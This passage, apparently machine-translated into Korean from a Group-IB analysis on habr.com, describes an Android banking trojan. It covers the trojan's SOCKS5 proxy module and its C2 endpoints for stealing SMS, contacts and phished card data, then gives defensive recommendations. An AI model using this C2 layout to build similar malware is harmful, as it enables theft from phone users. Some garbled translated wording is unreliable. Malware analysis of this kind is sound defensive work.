ConnectionId 명령을 수신한 경우(새 연결을 생성하려는 경우) 명령연결 클래스의 인스턴스를 생성합니다 프록시 연결.

• 두 클래스가 프록시에 참여합니다. 프록시 연결 и end. 수업을 만들 때 프록시 연결 주소에 연결 중 ProxyConfigClass.host: ProxyConfigClass.proxyPort JSON 객체를 전달합니다.

 {
    "id":<%connectionId%>
}

이에 대한 응답으로 서버는 연결을 설정해야 하는 원격 서버의 주소가 포함된 SOCKS5 메시지를 보냅니다. 이 서버와의 상호 작용은 클래스를 통해 발생합니다. end. 연결 설정은 다음과 같이 개략적으로 표현될 수 있습니다.

네트워크 상호작용

네트워크 스니퍼에 의한 트래픽 분석을 방지하기 위해 SSL 프로토콜을 사용하여 CnC 서버와 애플리케이션 간의 상호 작용을 보호할 수 있습니다. 서버와 주고받는 모든 전송 데이터는 JSON 형식으로 표시됩니다. 애플리케이션은 작업 중에 다음 요청을 실행합니다.

• http://<%CnC%>/api/v1/set_state.php — 명령 실행의 결과.
• http://<%CnC%>/api/v1/get.php — 명령을 받습니다.
• http://<%CnC%>/api/v1/load_sms.php — 감염된 장치에서 SMS 메시지를 다운로드합니다.
• http://<%CnC%>/api/v1/load_ab.php — 감염된 장치에서 연락처 목록을 업로드합니다.
• http://<%CnC%>/api/v1/aevents.php – 기본 설정 파일에 있는 매개변수를 업데이트할 때 요청이 이루어집니다.
• http://<%CnC%>/api/v1/set_card.php — Google Play 마켓으로 가장한 피싱 창을 사용하여 얻은 데이터 업로드.
• http://<%CnC%>/api/v1/logs.php – 로그 데이터를 업로드하는 중입니다.
• http://<%CnC%>/api/v1/records.php – 피싱 창구를 통해 획득한 데이터를 업로드하는 행위.
• http://<%CnC%>/api/v1/set_error.php – 발생한 오류에 대한 알림.

추천

모바일 트로이 목마의 위협으로부터 고객을 보호하기 위해 기업은 사용자 장치에 추가 소프트웨어를 설치하지 않고도 악성 활동을 모니터링하고 방지할 수 있는 포괄적인 솔루션을 사용해야 합니다.

이를 위해서는 클라이언트와 애플리케이션 자체의 동작을 분석하는 기술을 통해 모바일 트로이 목마를 탐지하는 서명 방법을 강화해야 합니다. 보호에는 디지털 지문 기술을 사용하는 장치 식별 기능도 포함되어야 합니다. 이를 통해 계정이 비정형 장치에서 사용 중이고 이미 사기꾼의 손에 들어간 경우를 파악할 수 있습니다.

근본적으로 중요한 점은 기업이 인터넷뿐만 아니라 모바일 채널(예: 모바일 뱅킹 애플리케이션, 암호화폐 거래 및 기타 모바일 채널)에서 발생하는 위험을 제어할 수 있도록 하는 교차 채널 분석의 가용성입니다. 거래가 가능합니다.금융 거래.

사용자를 위한 안전 규칙:

• Google Play 이외의 소스에서 Android OS가 설치된 모바일 장치용 애플리케이션을 설치하지 마십시오. 애플리케이션에서 요청하는 권리에 특별한 주의를 기울이십시오.
• 정기적으로 Android OS 업데이트를 설치합니다.
• 다운로드한 파일의 확장자에 주의하세요.
• 의심스러운 자원을 방문하지 마십시오.
• SMS 메시지로 받은 링크를 클릭하지 마십시오.

주연 세묜 로가체바, Group-IB 컴퓨터 법의학 연구소의 맬웨어 연구 주니어 전문가입니다.

출처 : habr.com